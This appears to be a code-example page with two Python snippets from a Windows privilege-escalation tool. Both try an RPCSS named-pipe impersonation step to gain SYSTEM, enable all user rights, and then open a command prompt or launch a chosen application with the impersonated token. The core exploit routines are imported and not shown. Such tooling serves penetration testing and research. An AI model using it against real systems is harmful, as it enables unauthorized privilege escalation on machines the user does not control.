Пример #1
def rpcss(args):
    """Run the 'RPCSS' escalation step and, on success, open a command shell.

    Calls ``Escalation.namedPipeImpersonationSystemViaRPCSS()``. When that
    call reports success, all user rights are enabled on an ``Impersonate``
    helper, which then runs a command prompt with the thread's effective
    token. On failure an error is logged and nothing else happens.

    Args:
        args: Parsed command-line arguments; not read by this function.

    Returns:
        None in every case; the outcome is only visible through the
        console/log output.
    """
    printT("Trying to exploit 'RPCSS'...")
    printT("It can take many seconds, so wait...")
    succeeded = Escalation().namedPipeImpersonationSystemViaRPCSS()
    # Equality with True (not plain truthiness) is kept deliberately: the
    # method's full set of return values is not visible from this function.
    if not (succeeded == True):
        logging.error("Impossible to exploit 'RPCSS'")
        return
    impersonator = Impersonate()
    impersonator.enableAllUserRights()
    impersonator.executeCMDWithThreadEffectiveToken()
Пример #2
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

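import sys

# NOTE(review): '../' is resolved against the current working directory, not
# against this file's location, so which utils/escalation/impersonate modules
# are imported depends on where the script is started from.
sys.path.append('../')
from utils import *

# Called before the remaining project imports; the original order is kept.
configureLogging()
from escalation import Escalation
from impersonate import Impersonate
import subprocess
import time

# The application to launch comes from the first command-line argument.
# Validate it up front so a missing argument yields a usage message rather
# than an IndexError after the earlier steps have already run.
if len(sys.argv) < 2:
    sys.exit("usage: {0} <application>".format(sys.argv[0]))

esc = Escalation()
status = esc.namedPipeImpersonationSystemViaRPCSS()
# Fail closed: do not go on to launch anything when the impersonation step
# did not report success. Only an explicit True counts as success here;
# NOTE(review): the method's other return values are not visible in this
# file -- confirm against Escalation.
if not (status == True):
    sys.exit("Impossible to exploit 'RPCSS'")
imp = Impersonate()
imp.enableAllUserRights()  # required, otherwise not enough privileges
imp.executeWithThreadEffectiveToken(appName=sys.argv[1])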